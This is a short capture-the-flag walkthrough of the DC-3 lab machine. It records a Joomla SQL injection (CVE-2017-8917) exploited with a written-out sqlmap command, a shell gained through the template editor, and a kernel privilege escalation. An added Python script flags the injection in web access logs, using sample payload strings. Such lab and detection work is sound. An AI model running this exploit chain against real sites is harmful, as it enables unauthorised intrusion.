DC-3
usershell
Target IP: 192.168.205.129
Only port 80 is open, and it is running Joomla
[CVE-2017-8917] [http] [critical]
Found an SQL injection, so ran sqlmap against it directly
sqlmap -u "http://192.168.205.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1*"
Logged in to the admin backend and got a shell through the template editor
Got user-level access
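For the defending side, the com_fields request above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original write-up: it scans combined-format log lines for com_fields requests whose list[fullordering] value is not a plain column/direction pair. The log lines are constructed, and the SAFE_ORDER pattern is an assumption about what a benign sort value looks like.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (combined log format), not taken from the page.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=1%20AND%201%3D1 HTTP/1.1" 500 310 "-" "sqlmap/1.7"
192.0.2.20 - - [01/Jan/2024:10:00:09 +0000] "GET /administrator/index.php?option=com_fields&view=fields&list[fullordering]=a.title%20ASC HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
192.0.2.66 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT%201) HTTP/1.1" 500 310 "-" "curl/8.0"
"""

# Request line inside the quoted field of a combined-format log entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Assumption: a benign sort value is "<column>" or "<column> ASC|DESC".
SAFE_ORDER = re.compile(r"[A-Za-z_][\w.]*( (ASC|DESC))?", re.IGNORECASE)


def find_suspicious(log_text):
    """Return (client_ip, path, value) for each com_fields request whose
    list[fullordering] parameter is not a plain column/direction pair."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        # parse_qsl URL-decodes keys and values, so %5B/%5D and [ ] compare equal.
        pairs = parse_qsl(query, keep_blank_values=True)
        if ("option", "com_fields") not in pairs:
            continue
        # Check every occurrence so a duplicated parameter cannot hide a bad value.
        for key, value in pairs:
            if key == "list[fullordering]" and not SAFE_ORDER.fullmatch(value):
                hits.append((line.split()[0], path, value))
    return hits


if __name__ == "__main__":
    for ip, path, value in find_suspicious(SAMPLE_LOG):
        print(f"{ip} {path} list[fullordering]={value!r}")
```
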
rootshell
Kernel privilege escalation with CVE-2016-4557